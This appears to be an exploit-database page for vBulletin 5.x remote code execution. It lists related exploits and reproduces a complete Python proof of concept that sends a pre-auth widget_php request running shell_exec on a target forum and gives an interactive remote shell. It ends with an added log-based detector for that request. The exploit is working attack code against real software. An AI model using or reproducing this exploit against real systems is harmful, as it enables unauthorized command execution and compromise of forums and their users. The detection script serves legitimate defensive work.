| Title | Published | Views | Family |
|---|---|---|---|
| vBulletin 5.x - Remote Command Execution Exploit | 1 Oct 2019 00:00 | – | zdt |
| vBulletin 5.5.4 Remote Command Execution Exploit #RCE | 11 Dec 2019 00:00 | – | zdt |
| vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit | 12 Aug 2020 00:00 | – | zdt |
| vBulletin 5.x Remote Code Execution Exploit | 12 Aug 2020 00:00 | – | zdt |
| Exploit for Code Injection in Vbulletin | 16 Aug 2020 18:17 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 16 Aug 2020 18:17 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 26 Sep 2019 03:56 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 12 Oct 2019 18:51 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 24 Aug 2020 16:15 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 26 Sep 2019 03:27 | – | githubexploit |

```python
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None
# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.
# More info can be found at:
# https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex
import argparse
import requests
import sys


def run_exploit(vb_loc, shell_cmd):
    post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
    r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
    return r.text


ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()

while True:
    try:
        cmd = input("vBulletin5$ ")
        print(run_exploit(ARGS.location, cmd))
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception as e:
        sys.exit(str(e))
```
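
A log-side check for the request shape this exploit sends, as an added example that is not part of the original exploit or of vBulletin's code. The function name, severity labels and sample requests are constructed for illustration, and it assumes the detector can see the POST body (for example from a WAF or reverse-proxy log).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Route and parameter names are taken from the request in the exploit above.
ROUTE = "/ajax/render/widget_tabbedcontainer_tab_panel"
TEMPLATE_KEY = re.compile(r"^subwidgets\[[^\]]*\]\[template\]$", re.I)
CODE_KEY = re.compile(r"^subwidgets\[[^\]]*\]\[config\]\[code\]$", re.I)


def classify(method, target, body):
    """Return (severity, reasons) for one HTTP request.

    'high'   = POST to the route with a widget_php sub-widget template
    'medium' = POST to the route without that marker (review manually)
    'none'   = unrelated request
    """
    path = urlsplit(target).path.rstrip("/").lower()
    if method.upper() != "POST" or not path.endswith(ROUTE):
        return "none", []
    reasons = ["POST to " + ROUTE]
    severity = "medium"
    # parse_qsl percent-decodes names and values, so encoded brackets
    # (subWidgets%5B0%5D%5Btemplate%5D) are matched as well.
    for key, value in parse_qsl(body, keep_blank_values=True):
        if TEMPLATE_KEY.match(key) and value.strip().lower() == "widget_php":
            severity = "high"
            reasons.append(key + "=widget_php")
        elif CODE_KEY.match(key):
            reasons.append("%s present (%d bytes)" % (key, len(value)))
    return severity, reasons


# Constructed sample requests: (method, request target, form body).
SAMPLES = [
    ("POST", "/forum/ajax/render/widget_tabbedcontainer_tab_panel",
     "subWidgets%5B0%5D%5Btemplate%5D=widget_php"
     "&subWidgets%5B0%5D%5Bconfig%5D%5Bcode%5D=PLACEHOLDER"),
    ("POST", "/ajax/render/widget_tabbedContainer_tab_panel",
     "subWidgets[0][template]=widget_example"),
    ("GET", "/forum/showthread.php?t=42", ""),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, target, classify(method, target, body))
```

Because the affected range on this page ends at 5.6.2, a "high" result against a forum at or below that version warrants incident response rather than only blocking the request.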